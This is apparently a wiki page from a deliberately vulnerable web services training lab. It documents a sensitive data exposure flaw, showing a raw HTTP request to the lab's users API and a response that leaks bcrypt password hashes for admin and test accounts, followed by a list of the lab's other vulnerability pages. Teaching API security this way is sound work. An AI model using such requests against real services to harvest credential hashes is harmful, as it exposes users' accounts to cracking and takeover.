-
Notifications
You must be signed in to change notification settings - Fork 178
Sensitive Data Exposure
Sam Sanoop edited this page Oct 31, 2021
·
1 revision
APIs can often leak sensitive data through unexpected API calls.
Any users can make a request to the users API
GET /api/v2/users HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjM1NzE5NDU4LCJleHAiOjE2MzU4OTIyNTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.SSlXSXbYMMjRaS_nZ0jPmfL2VPAjmmIZrhC_uvcSnyA
Connection: close
Referer: http://dvws.local/notes.html
Content-Length: 1
which will reveal password hashes for all users
HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: application/json; charset=utf-8
Content-Length: 336
ETag: W/"150-Xw8+sEjh1vjh0KogCeUZCZSx51Q"
Date: Sun, 31 Oct 2021 22:36:46 GMT
Connection: close
{"status":200,"error":null,"result":[{"admin":true,"_id":"617f1824f47a696aa2253c3b","username":"admin","password":"$2b$10$IzyYy1Nu0E16SMjT7/erPuMvruixa5zx4UEkB.kRY3WbBfXakqBBm","__v":0},{"admin":false,"_id":"617f1824f47a696aa2253c3c","username":"test","password":"$2b$10$dvXrjBHMAp8XHtAMIxru8eagiPIavQrIS1jaoOtJgUEQbQJjyl80G","__v":0}]}
- XML External Entity Injection
- Server Side Request Forgery (SSRF)
- Username Enumeration
- NoSQL Injection
- Insecure Direct Object Reference
- Mass Assignment
- Cross Site Scripting (XSS)
- Hidden API Functionality Exposure
- SQL Injection
- Information Disclosure
- Insecure PostMessage Configuration
- Command Injection
- Prototype Pollution
- JSON Hijacking
- XPath Injection
- Cross Origin Resource-Sharing Misonfiguration
- JWT Secret Key Brute Force
- Vertical Access Control
- Horizontal Access Control
- Open Redirect
- Path Traversal
- Unsafe Deserialization
- Sensitive Data Exposure
- Arbitrary File Write
- Introspection Enabled
- GraphQL Access Control Issues
- GraphQL Batching Brute Force
- Client Side Template Injection